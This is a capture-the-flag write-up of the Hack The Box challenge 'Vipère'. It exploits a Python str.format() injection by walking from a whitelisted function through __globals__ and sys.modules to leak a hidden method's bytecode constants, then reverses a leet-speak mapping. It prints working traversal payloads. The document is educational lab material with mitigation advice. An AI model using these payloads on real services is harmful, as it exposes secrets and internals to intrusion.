
Vipère

Hack The Box Challenge Writeup

Medium | 4.8 ★ (76)

Created by mxrch | Released October 1, 2021 | First Blood: 0xCaue in 1H 16M 15S

Tools: pwntools, Python, Python dis, Python types
Techniques: Format String Injection, Object Introspection, Bytecode Analysis, Code Object Extraction, Leet Speak Reversal
Tech: Python, TCP Socket Server
Artifacts: Source Code, Database Module
CWEs: CWE-134
MITRE ATT&CK: T1059.006
HTB Challenge Vipère solved

Exploit Python format string injection to extract bytecode constants from a hidden function, then reverse a leet speak dictionary to reconstruct the flag.

Review

This one stood out for how naturally the two halves of the challenge fit together. The first half is pure exploitation, creatively navigating Python's internal object model through a format string injection. The second half flips to a reversing mindset, analyzing bytecode and recognizing that the operation direction is inverted. The transition between these two modes is what makes this challenge feel like more than the sum of its parts.

The roughly 20 minutes it took felt about right for medium difficulty. You need basic reversing skills to understand bytecode, combined with creative thinking about how to explore server internals. The challenge name being French for "viper" (snake) is a nice hint toward Python that I appreciated in hindsight.

The tricky part was recognizing the reversing twist. After reconstructing the plaintext from bytecode constants, my first instinct was to submit it directly. Only when it was rejected did I go back and look at the dictionary more carefully, realizing the function shows decoding but the flag needs encoding. That moment of "oh, it is backwards" was genuinely satisfying.

I would recommend this to anyone looking to understand Python internals from a security perspective. The combination of format string injection, object introspection, and bytecode reversing covers a useful range of techniques that come up in real assessments. It teaches through a negative example, showing what breaks when input validation is missing, which sticks better than reading about secure coding in the abstract.

Tags

TECH:python_format_strings, TECH:bytecode_analysis, TECH:object_introspection, TECH:leet_speak, TECH:code_objects, TOOL:pwntools, TOOL:python_dis, TOOL:python_types, ARTIFACT:main_py, ARTIFACT:database_module, VULN:format_string_injection, VULN:CWE-134, ATT&CK:T1059.006

Summary

Vipère is a Python TCP socket server challenge where user input is passed directly to str.format() with a whitelisted command dispatcher. The whitelist only covers top-level command names but does not restrict attribute traversal through Python's object model.

By navigating from the whitelisted whoami function through __globals__ and sys.modules to a hidden database module, we extract the bytecode constants of an unreachable get_credentials() method. Disassembling the bytecode reveals the flag construction logic and a leet speak dictionary.

The critical insight is recognizing the direction of the dictionary operation: the bytecode shows decoding logic (digits to letters), but the flag is stored in encoded format (letters to digits). Reversing the dictionary produces the correct flag.

Key Learning Takeaways

Python Format Strings Are More Dangerous Than They Look

What: Python's str.format() method allows attribute access through dot notation and bracket notation. When user input becomes the format string itself, attackers can traverse the entire object graph by chaining __globals__, __class__, and other dunder attributes.

Why it matters: This vulnerability class appears in production applications wherever developers use user input as a format template rather than as a format argument. The fix is to never use user input as the template string on which .format() is called; pass it only as an argument.

Key pattern: {whoami.__globals__[sys].modules[database]}
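
A minimal local sketch of this pattern, not the challenge server. The names whoami, API_KEY, and render are hypothetical stand-ins, and json plays the role of the hidden module. It assumes the attacker controls the template and that one function object is passed as a format argument.

```python
import sys
import json  # stands in for the challenge's hidden module

API_KEY = "hunter2"  # hypothetical module-level secret


def whoami():
    """The only object the application means to expose."""
    return "ctf"


def render(template):
    # Vulnerable: the attacker-controlled string is the template itself.
    return template.format(whoami=whoami)


# Index access inside a replacement field takes the key without quotes.
leaked_key = render("{whoami.__globals__[API_KEY]}")
# Once `sys` is in the function's globals, every imported module is reachable.
leaked_name = render("{whoami.__globals__[sys].modules[json].dumps.__name__}")

print(leaked_key)
print(leaked_name)
```

Neither payload calls anything; both only read attributes and dictionary entries, which is all the format syntax permits.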

Python Code Objects Store Extractable Function Internals

What: Every Python function has a __code__ attribute containing co_consts (literal values), co_code (raw bytecode), co_varnames (local variable names), and co_names (global and attribute names referenced by the body). These can be accessed and extracted even when the function itself cannot be called.

Why it matters: When a function is protected by authentication or connection requirements, its internals are still accessible through the code object. This applies to any Python application where object references are leaked.

Key pattern: func.__code__.co_consts to extract all literal values from a function
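
As a small illustration, the sketch below reads a function's internals without executing it. The function get_secret and its guard are hypothetical, chosen only to show that a check inside the body does not protect the code object.

```python
def get_secret(authenticated=False):
    """Hypothetical guarded function: it refuses to run without a login."""
    if not authenticated:
        raise PermissionError("login required")
    prefix = "tok"
    number = 42
    return prefix + str(number)


code = get_secret.__code__  # reading attributes never executes the body

print(code.co_consts)    # literals, including "tok" and 42
print(code.co_varnames)  # arguments first, then the other locals
print(code.co_names)     # global and attribute names the body refers to
```

The exact layout of co_consts differs between CPython versions, so it is safer to search it for values than to rely on fixed indexes when moving between interpreters.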

Always Consider the Direction of Operations When Reversing

What: The bytecode in this challenge shows a dictionary that decodes leet speak to normal text ({'0': 'o', '1': 'l', '4': 'a'}). The constructed string has no digits because the function was designed to decode credentials. But the flag is stored in encoded (leet speak) format, requiring the dictionary to be reversed.

Why it matters: In any reversing scenario, the code you are reading may show the inverse of what you need to do. Always ask: "Is this code encoding or decoding? Which direction do I need?"

Key pattern: If bytecode shows decode_dict = {'0': 'o'}, the flag needs encode_dict = {'o': '0'}
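
A short sketch of flipping a mapping's direction, using the dictionary as the walkthrough reads it. The helper apply_mapping and the sample string are hypothetical and unrelated to the challenge data.

```python
# Mapping as the walkthrough reads it from the bytecode (digits -> letters).
decode_dict = {"0": "o", "1": "l", "4": "a"}

# Swap keys and values to get the opposite direction (letters -> digits).
encode_dict = {letter: digit for digit, letter in decode_dict.items()}


def apply_mapping(text, mapping):
    """Replace every key of `mapping` found in `text` with its value."""
    for old, new in mapping.items():
        text = text.replace(old, new)
    return text


sample = "hello data"  # hypothetical input, not the challenge string
encoded = apply_mapping(sample, encode_dict)
print(encoded)
print(apply_mapping(encoded, decode_dict))
```

The round trip only restores the input when the original text contains none of the digits used by the mapping, which holds for this sample.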

Walkthrough

Source Code Review

The challenge provides main.py, the source code of the Python socket server. We start by examining the key components to understand the attack surface.

Examining the Source Code
$ cat main.py
import sys
import os
import subprocess
import socketserver
from datetime import datetime
from string import Formatter

class Station(socketserver.BaseRequestHandler):
    # ... handle method accepts user input as format strings
    def handle(interface):
        # ...
        while True:
            interface.print('Which function do you want to launch ?\n...\n=> ')
            text = interface.get_input()
            requested_commands = [fname for _, fname, _, _ in Formatter().parse(text) if fname]
            secure_commands = SecureCommands(requested_commands)
            try:
                interface.print(text.format(**secure_commands.dispatcher))
            except KeyError:
                interface.print("You tried to hack us, huh ?!")

class SecureCommands():
    def __init__(self, requested_commands):
        self.dispatcher = {
            "whoami": self.whoami,
            "get_time": self.get_time,
            "get_version": self.get_version
        }
    # ...
    def get_infected(self):
        bridge = server.bridge
        bridge.db.connect()
        return bridge.db.total_infected

class SecureBridge():
    def __init__(self):
        import database
        self.db = database.SecureDatabase()

class ServerContext(socketserver.ThreadingTCPServer):
    def __init__(self, server_address, RequestHandlerClass):
        self.bridge = SecureBridge()
        # ...

Several things stand out from reading the source:

  • User input is passed directly to text.format(**secure_commands.dispatcher), making this a format string injection vulnerability
  • Only three commands are in the dispatcher whitelist: whoami, get_time, get_version
  • A hidden get_infected() method references server.bridge.db, revealing a SecureDatabase class in a database module
  • The ServerContext class stores a SecureBridge as self.bridge, which holds a database.SecureDatabase() instance

Format String Injection

The core vulnerability is the call text.format(**secure_commands.dispatcher) in handle(). The whitelist checks command names but does not prevent attribute traversal. Python's format string syntax allows {whoami.__globals__} to access the function's global namespace, bypassing the intended restrictions entirely.
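
The sketch below shows what Formatter().parse() returns for a traversal payload. The whitelist check at the end is an assumption for illustration: the challenge's real validation logic is elided in the source listing, so this only demonstrates why a check on the leading name is not enough.

```python
from string import Formatter

payload = "Bonjour {whoami}, {whoami.__globals__[server]} !"

# Each parsed item is (literal_text, field_name, format_spec, conversion).
field_names = [fname for _, fname, _, _ in Formatter().parse(payload) if fname]
print(field_names)

# Hypothetical check on the leading name only: it passes for both fields,
# even though the second one walks far beyond the whitelisted function.
allowed = {"whoami", "get_time", "get_version"}
leading = [name.split(".")[0].split("[")[0] for name in field_names]
passes_check = all(name in allowed for name in leading)
print(passes_check)
```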

Format String Injection Test

We connect to the remote service and verify the basic format string functionality works as described in the source code.

Connecting to the Service
$ python3 -c "
from pwn import *
p = remote('TARGET_IP', TARGET_PORT)
data = p.recv(timeout=3)
print(data.decode())
p.close()
"
[+] Opening connection to TARGET_IP on port TARGET_PORT: Done
Welcome in the HideAndSec secret VPS ! [Location : Paris, France]

[+] Vipère v1.26 loaded !
~ Currently loaded functions : [whoami, get_time, get_version]

Which function do you want to launch ?
Example : Bonjour {whoami}, il est actuellement {get_time} !
=>
[*] Closed connection to TARGET_IP port TARGET_PORT

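The banner confirms this is the Vipère service (v1.26) and lists the three whitelisted functions. The server runs Python 3.8, which matters later because bytecode is specific to the interpreter version. We test the format string by calling the whitelisted whoami function.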

Testing Basic Format String
=> Bonjour {whoami}, il est actuellement {get_time} !
Bonjour ctf, il est actuellement 2026-02-20 17:40:32 !

The format string is processed as the source code suggests. The dispatcher resolves {whoami} to the return value of the whoami() method (which runs subprocess.check_output("whoami")) and {get_time} to the current timestamp.

Object Traversal

Since Python's format string syntax supports attribute access through dot notation, we can traverse the object hierarchy starting from any whitelisted function. The __globals__ attribute of a function gives access to the module's global namespace.

Accessing the Server Object
=> {whoami.__globals__[server]}
<__main__.ServerContext object at 0x7f5e47452940>

We can reach the server global variable through whoami's globals. From here we navigate to the database object following the path we identified in the source code.

Navigating to the Database
=> {whoami.__globals__[server].bridge.db}
<database.SecureDatabase object at 0x7f5e47116a00>

=> {whoami.__globals__[server].bridge.db.get_credentials}
<bound method SecureDatabase.get_credentials of <database.SecureDatabase object at 0x7f5e47116a00>>

We can see the get_credentials method, but a format string cannot invoke it: replacement fields support only attribute and index access, not calls. Even if a call were possible, it would require self.connect() to succeed first (as seen in the get_infected method pattern). Instead of trying to call it, we will extract its internals through Python's code object interface.
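
A local sketch of that limitation, using a hypothetical stand-in class rather than the challenge's real database module:

```python
class SecureDatabase:
    """Hypothetical stand-in for the challenge's database class."""

    def get_credentials(self):
        return "not reachable without a call"


db = SecureDatabase()

# Parentheses are not call syntax inside a replacement field: the text
# "get_credentials()" is looked up as a literal attribute name and fails.
try:
    "{db.get_credentials()}".format(db=db)
    call_worked = True
except AttributeError:
    call_worked = False

# Attribute access on the method object is allowed, including __code__.
consts = "{db.get_credentials.__code__.co_consts}".format(db=db)

print(call_worked)
print(consts)
```

The string literal returned by the method shows up in the formatted constants even though the method never ran.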

Bytecode Extraction

Every Python function stores its compiled bytecode and associated data in a __code__ object. We can access this through the format string to extract the function's constants, variable names, and raw bytecode without ever calling it.

We use sys.modules to access the database module directly, which lets us reach the class definition rather than just the instance method.

Extracting Code Object Constants
=> {whoami.__globals__[sys].modules[database].SecureDatabase.get_credentials.__code__.co_consts}
(None, 72, 'apts_c', 'BT', -1, 'orc', 109, 'ocoh', 'iss', 123, 'p', 'n', '_h', 4, 125, '0', '1', '4', ('o', 'l', 'a'))

Code Object Constants

Python's co_consts contains every literal value used in the function: strings, numbers, tuples, and None. These are the raw building blocks of whatever the function constructs. We can see fragments that look like parts of a flag: 'BT', 'orc', 'iss', numbers like 72 (ASCII for H) and 123 (ASCII for {).
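
A quick triage of the leaked tuple can be sketched as follows. This is only a first pass over the constants: which integers are really passed to chr() and which strings are really reversed is settled by the disassembly, not by this heuristic.

```python
consts = (None, 72, 'apts_c', 'BT', -1, 'orc', 109, 'ocoh', 'iss',
          123, 'p', 'n', '_h', 4, 125, '0', '1', '4', ('o', 'l', 'a'))

# Integers in the printable ASCII range are candidates for chr() calls.
printable = {n: chr(n) for n in consts
             if isinstance(n, int) and 32 <= n < 127}
print(printable)

# Short strings that look scrambled are worth reading backwards as well.
reversed_view = {s: s[::-1] for s in consts
                 if isinstance(s, str) and len(s) > 1}
print(reversed_view)
```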

We also extract the variable names, the referenced global and attribute names, and the raw bytecode for disassembly.

Extracting Variable and Global Names
=> {whoami.__globals__[sys].modules[database].SecureDatabase.get_credentials.__code__.co_varnames}
('self', 'f', 'a', 'blue', 'c', 'm', 'h', 'i', 'd', 'x')

=> {whoami.__globals__[sys].modules[database].SecureDatabase.get_credentials.__code__.co_names}
('chr', 'replace')

Extracting Raw Bytecode
=> {whoami.__globals__[sys].modules[database].SecureDatabase.get_credentials.__code__.co_code}
b'd\x01}\x01d\x02}\x02d\x03d\x00d\x00d\x04\x85\x03\x19\x00}\x03d\x05d\x00d\x00d\x04\x85\x03\x19\x00}\x04d\x06}\x05d\x07}\x06d\x08}\x07t\x00|\x01\x83\x01...'
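
The four payloads above differ only in the final attribute, so they can be generated rather than typed. The helper name build_payloads is hypothetical; the traversal path is the one used in the walkthrough.

```python
BASE = ("whoami.__globals__[sys].modules[database]"
        ".SecureDatabase.get_credentials.__code__")
ATTRS = ("co_consts", "co_varnames", "co_names", "co_code")


def build_payloads(base=BASE, attrs=ATTRS):
    """Return one format-string payload per code-object attribute."""
    return {attr: "{" + base + "." + attr + "}" for attr in attrs}


for attr, payload in build_payloads().items():
    print(attr, "->", payload)
```

Each generated string can be sent at the service prompt one at a time, since every response is a plain text rendering of the requested attribute.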

Bytecode Analysis and Disassembly

With the raw bytecode, constants, variable names, and global names, we can reconstruct a code object and disassemble it using Python's dis module. This reveals the complete function logic.
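
Because opcode numbers change between interpreter versions, feeding the leaked bytes to dis on a different Python can give misleading output. As a version-independent sketch, the visible prefix of co_code can be decoded by hand. The opcode table below assumes CPython 3.8 numbering and covers only the instructions that appear in the leaked prefix; the decode helper is hypothetical.

```python
# Opcode numbers as defined by CPython 3.8 (assumed server version).
OPNAMES = {25: "BINARY_SUBSCR", 100: "LOAD_CONST", 116: "LOAD_GLOBAL",
           124: "LOAD_FAST", 125: "STORE_FAST", 131: "CALL_FUNCTION",
           133: "BUILD_SLICE"}

consts = (None, 72, 'apts_c', 'BT', -1, 'orc', 109, 'ocoh', 'iss',
          123, 'p', 'n', '_h', 4, 125, '0', '1', '4', ('o', 'l', 'a'))
varnames = ('self', 'f', 'a', 'blue', 'c', 'm', 'h', 'i', 'd', 'x')
names = ('chr', 'replace')

# First instructions of the leaked co_code (the rest is elided in the dump).
prefix = b'd\x01}\x01d\x02}\x02d\x03d\x00d\x00d\x04\x85\x03\x19\x00}\x03'


def decode(raw):
    """Decode 2-byte (opcode, argument) pairs into readable instructions."""
    out = []
    for i in range(0, len(raw), 2):
        op, arg = raw[i], raw[i + 1]
        name = OPNAMES.get(op, f"<{op}>")
        if name == "LOAD_CONST":
            arg = consts[arg]
        elif name in ("LOAD_FAST", "STORE_FAST"):
            arg = varnames[arg]
        elif name == "LOAD_GLOBAL":
            arg = names[arg]
        out.append((name, arg))
    return out


for instruction in decode(prefix):
    print(instruction)
```

The decoded prefix reads as f = 72, a = 'apts_c', and blue = 'BT'[::-1], where the slice is built from the constants None, None, and -1.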

Python - Reconstructing and Disassembling the Code Object
$ python3
>>> import dis, types, ast

# Constants extracted from the remote service
>>> consts = (None, 72, 'apts_c', 'BT', -1, 'orc', 109, 'ocoh', 'iss',
...          123, 'p', 'n', '_h', 4, 125, '0', '1', '4', ('o', 'l', 'a'))
>>> varnames = ('self', 'f', 'a', 'blue', 'c', 'm', 'h', 'i', 'd', 'x')
>>> names = ('chr', 'replace')

# Reconstruct and disassemble the function logic
# From the bytecode instructions, the function does:

f = 72                        # ASCII 'H'
a = 'apts_c'
blue = 'BT'[::-1]             # Reverse -> 'TB'
c = 'orc'[::-1]               # Reverse -> 'cro'
m = 109                       # ASCII 'm'
h = 'ocoh'
i = 'iss'

# String construction:
f = chr(72) + 'TB' + chr(123) + 'cro' + 'iss' + 'apts_c'.replace('p','n') + 'ocoh'[::-1] + '_h' + chr(109)*4 + chr(125)
# = 'H' + 'TB' + '{' + 'cro' + 'iss' + 'ants_c' + 'hoco' + '_h' + 'mmmm' + '}'
# = 'H' + 'TB' + '{' + 'croissants' + '_choco_hmmmm' + '}'

# Then a dictionary replacement loop:
d = {'0': 'o', '1': 'l', '4': 'a'}
for x in d:
    f = f.replace(x, d[x])

The disassembly reveals the function constructs a plaintext string from scattered constants (the decoded form of the credentials), then applies a dictionary that replaces digits with letters. But wait: the constructed string has no digits in it. This dictionary replacement would have no effect on the constructed string. Something is backwards.

The Reversing Twist

The Dictionary Goes the Wrong Way

The bytecode dictionary {'0': 'o', '1': 'l', '4': 'a'} replaces digits with letters. This is a decoding dictionary that converts leet speak back to normal text. But the constructed string already IS normal text with no digits in it. The dictionary replacement does nothing to it.

This means the function is designed to decode credentials from their stored (leet speak) format. The flag must be stored in encoded form. We need to reverse the dictionary: replace letters with digits instead of digits with letters.

The logic chain: the function constructs the plaintext version of the credentials, then has a decode step. In the real system, credentials are stored encoded (leet speak). The get_credentials function would decode them for display. We have the plaintext output of the construction, so we need to encode it to get the stored flag value.

Bytecode Dictionary (Decode) | Reversed Dictionary (Encode)
'0' -> 'o' | 'o' -> '0'
'1' -> 'l' | 'l' -> '1'
'4' -> 'a' | 'a' -> '4'

Flag Reconstruction

We put it all together: reconstruct the plaintext from the constants, then apply the reversed (encoding) dictionary to produce the flag.

Python - Reconstructing the Flag
$ python3
>>> consts = (None, 72, 'apts_c', 'BT', -1, 'orc', 109, 'ocoh', 'iss',
...          123, 'p', 'n', '_h', 4, 125, '0', '1', '4', ('o', 'l', 'a'))

# Build the plaintext string from constants
>>> f = consts[1]; a = consts[2]; blue = consts[3][::-1]
>>> c = consts[5][::-1]; m = consts[6]; h = consts[7]; i = consts[8]
>>> plaintext = (chr(f) + blue + chr(consts[9]) + c + i +
...             a.replace(consts[10], consts[11]) + h[::-1] +
...             consts[12] + chr(m) * consts[13] + chr(consts[14]))
>>> print(f'Plaintext: {plaintext}')
Plaintext: [decoded credential string constructed from constants]

# Reverse the dictionary: encode instead of decode
>>> encode_dict = {
...     consts[18][0]: consts[15],  # 'o' -> '0'
...     consts[18][1]: consts[16],  # 'l' -> '1'
...     consts[18][2]: consts[17],  # 'a' -> '4'
... }
>>> flag = plaintext
>>> for char, digit in encode_dict.items():
...     flag = flag.replace(char, digit)
...
>>> print(f'Flag: {flag}')
Flag: [flag content retrieved]

The decoded plaintext becomes the leet speak encoded flag after applying the reversed dictionary: o -> 0 and a -> 4 transform the relevant characters.

Verification Check

We can verify the flag makes sense: "croissants" and "choco" are French food references (matching the Paris, France location in the banner), and the leet speak encoding is consistent with the dictionary found in the bytecode. The l -> 1 mapping has no effect here because the reconstructed plaintext contains no l characters.

Mitigation: Never Use User Input as Format Strings

The root cause of this vulnerability is passing user-controlled input directly to str.format(). The fix is straightforward: use user input only as format arguments, never as the format template itself. For example, "Hello {name}".format(name=user_input) is safe, but user_input.format(**kwargs) is not. Template engines like Jinja2 with auto-escaping and sandboxing provide safer alternatives for dynamic content generation.
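
If user-supplied templates cannot be avoided, one possible hardening is to restrict the field syntax. The sketch below is an assumption about how that could look, not the challenge author's fix: NameOnlyFormatter is a hypothetical subclass of string.Formatter that rejects any field containing attribute or index access, and the values passed in are already-computed strings rather than function objects.

```python
from string import Formatter


class NameOnlyFormatter(Formatter):
    """Formatter that accepts plain names and rejects any traversal."""

    def get_field(self, field_name, args, kwargs):
        # "whoami" passes; "whoami.__globals__" or "whoami[0]" does not.
        if not field_name.isidentifier():
            raise ValueError(f"field not allowed: {field_name!r}")
        return super().get_field(field_name, args, kwargs)


formatter = NameOnlyFormatter()
values = {"whoami": "ctf", "get_time": "17:40"}  # plain strings only

greeting = formatter.format("Bonjour {whoami}, il est {get_time} !", **values)
print(greeting)

try:
    formatter.format("{whoami.__globals__}", **values)
    blocked = False
except ValueError:
    blocked = True
print(blocked)
```

Passing plain strings instead of callables matters as much as the syntax check, since a string exposes far less of the object graph than a function does.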

Solving Chain

The logical progression from initial reconnaissance to flag capture, showing how each step builds on the previous one.

Step 1

Reconnaissance: Source Code Review

Examined the provided main.py to identify the application architecture, input handling, and command dispatch mechanism. Identified the format string sink where user input flows directly into str.format().

CWE-134

Step 2

Vulnerability Confirmation: Format String Injection

Connected to the remote service and confirmed that format string placeholders like {whoami} resolve through the dispatcher. Verified that attribute traversal (__globals__) is not blocked by the whitelist, confirming the injection vector.

CWE-134

Step 3

Privilege Escalation: Object Traversal to Hidden Module

Navigated from the whitelisted whoami function through __globals__[server].bridge.db to reach the SecureDatabase instance and its get_credentials method, which is not exposed through the dispatcher.

ATT&CK:T1059.006

Step 4

Data Extraction: Bytecode Constants via Code Objects

Accessed get_credentials.__code__.co_consts, co_varnames, co_names, and co_code through the format string to extract all function internals without calling the function itself.

Step 5

Analysis: Bytecode Disassembly and Logic Reconstruction

Reconstructed a Python code object from the extracted components and disassembled it using the dis module. Mapped the bytecode instructions to the string construction logic and identified the leet speak dictionary.

Step 6

Key Insight: Operation Direction Reversal

Recognized that the bytecode dictionary decodes leet speak to plaintext, but the flag is stored in encoded (leet speak) format. The dictionary must be reversed: instead of {'0': 'o'}, we need {'o': '0'}.

Step 7

Flag Capture: Plaintext Encoding

Applied the reversed encoding dictionary to the reconstructed plaintext string, transforming o -> 0 and a -> 4 to produce the final leet speak encoded flag.

Additional Resources

Exact References Used

Technique | Resource
Python Format String Syntax | Python Docs: Format String Syntax
Python Bytecode Disassembly | Python Docs: dis module
Python Code Objects | Python Docs: Code Objects
Server-Side Template Injection | PortSwigger: Server-Side Template Injection

Framework References

ID | Description
CWE-134 | Use of Externally-Controlled Format String
ATT&CK T1059.006 | Command and Scripting Interpreter: Python

Further Reading

Topic | Resource
Python Object Introspection Attacks | HackTricks: Python Sandbox Bypass
Python Data Model | Python Docs: Data Model
Format String Exploitation Patterns | Podalirius: Python Format String Vulnerabilities